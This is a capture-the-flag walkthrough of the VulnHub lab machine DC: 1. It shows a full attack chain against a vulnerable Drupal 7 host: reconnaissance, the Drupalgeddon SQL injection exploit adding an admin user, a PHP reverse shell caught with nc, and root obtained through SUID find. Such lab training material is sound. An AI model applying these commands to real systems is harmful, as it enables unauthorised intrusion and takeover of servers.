Information

DC: 1 is the first installment on the VulnHub series DC by DCAU. There are 5 flags available but flags the first 4 flags are hints on what to do next to capture the subsequent flag. As a result, this writeup will only focus on capturing the root flag.

DC: 1 aims to make the pentester gain control over a vulnerable Drupal installation and from use that control to establish a reverse shell, find vulnerabilities in the system, and escalate privileges to root.

Tasks

  • Capture the root flag

Summary

  • Use nmap to see the services
  • Use droopescan to see possible version(s) of Drupal
  • Use searchsploit to find an exploit on Drupal and use it to gain administrative access
  • Implement a reverse shell by posting a new post and use nc to catch the reverse shell
  • Spawn a proper shell with python
  • Use LinEnum to find possible vulnerabilities in the system to escalate current privileges to root

Walkthrough

nmap

We begin with a pretty basic nmap scan to see what services we’re dealing with.

$ nmap -sC -sV 192.168.2.111
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42936/tcp  status
|_  100024  1          43799/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have 3 services running; SSH on Port 22, HTTP on Port 80 with Drupal installed on it and RPC on Port 111.

HTTP

Taking a look at the HTTP, we’re greeted with a pretty empty Drupal website.

Drupal - Homepage

Other than a login box, there is nothing helpful here; no version number, posts or such. As a result, we have to gather more information regarding the system.

Reconning and Exploiting Drupal

Using droopescan we’ll gather more information on the Drupal installation.

$ pip install droopescan

$ droopescan scan drupal -u 192.168.2.111
[+] Themes found:                                                               
    seven http://192.168.2.111/themes/seven/
    garland http://192.168.2.111/themes/garland/

[+] Possible interesting urls found:
    Default admin - http://192.168.2.111/user/login

[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Plugins found:
    ctools http://192.168.2.111/sites/all/modules/ctools/
        http://192.168.2.111/sites/all/modules/ctools/LICENSE.txt
        http://192.168.2.111/sites/all/modules/ctools/API.txt
    views http://192.168.2.111/sites/all/modules/views/
        http://192.168.2.111/sites/all/modules/views/README.txt
        http://192.168.2.111/sites/all/modules/views/LICENSE.txt
    image http://192.168.2.111/modules/image/
    profile http://192.168.2.111/modules/profile/
    php http://192.168.2.111/modules/php/

droopescan found us several possible versions for Drupal but one thing is certain; it’s 7.2x. With that in mind, we’ll search searchsploit to find any known exploits that we can use to gain admin access. There are over 40 known exploits regarding Drupal, but the most relevant and useful one is shown below; Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User). Since our version is 7.2x this exploit will work on our version of Drupal.

$ searchsploit Drupal
-------------------------------------------------------------------------------
Exploit Title
-------------------------------------------------------------------------------
[...]

Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)

[...] 
-------------------------------------------------------------------------------
$ wget https://www.exploit-db.com/download/34992

$ python2 34992 -t http://192.168.2.111 -u Arszilla -p password
[!] VULNERABLE!

[!] Administrator user created!

[*] Login: Arszilla
[*] Pass: password
[*] Url: http://192.168.2.111/?q=node&destination=node

We’ve added Arszilla as an admin user with the password password.

Getting a Reverse Shell

Upon logging in we can see the posts, modules and other admin only content. By accessing Modules we can see currently installed modules and in that list we can see PHP Filter; which is disabled. After enabling it we can edit its permissions and allow Administrator to use it. Now we can go ahead and create a new post where the format is set to PHP Code and implement our reverse shell using pentestmoney’s PHP Reverse Shell script.

Drupal - PHP Reverse Shell

After creating our new post, we’ll spawn nc to catch the shell once we visit the post.

$ nc -lvnp 7500
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

Logging in as Root

Now that we have a reverse shell, we’ll start by spawning a proper shell using python and then use LinEnum to scan the system for possible vulnerabilities to exploit.

$ python -c 'import pty; pty.spawn("/bin/sh")'

$ cd /tmp

$ wget raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

$ chmod +x LinEnum.sh

$ ./LinEnum.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################

[...]

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find

[...]

LinEnum found an interesting SUID regarding find. A quick research reveals that find is vulnerable to --exec attack where an attacker can spawn a shell where they’re root.

$ find /etc/passwd -exec /bin/sh \;

$ whoami
root

$ cd /root

$ ls -la
drwx------  2 root root 4096 Feb 19 22:30 .aptitude
-rw-------  1 root root   44 Feb 28 12:11 .bash_history
-rw-r--r--  1 root root  949 Feb 19 23:03 .bashrc
drwxr-xr-x  3 root root 4096 Feb 19 23:03 .drush
-rw-r--r--  1 root root  140 Nov 20  2007 .profile
-rw-r--r--  1 root root  173 Feb 19 23:43 thefinalflag.txt

$ cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

Thus, we’ve gained captured the root flag in DC: 1.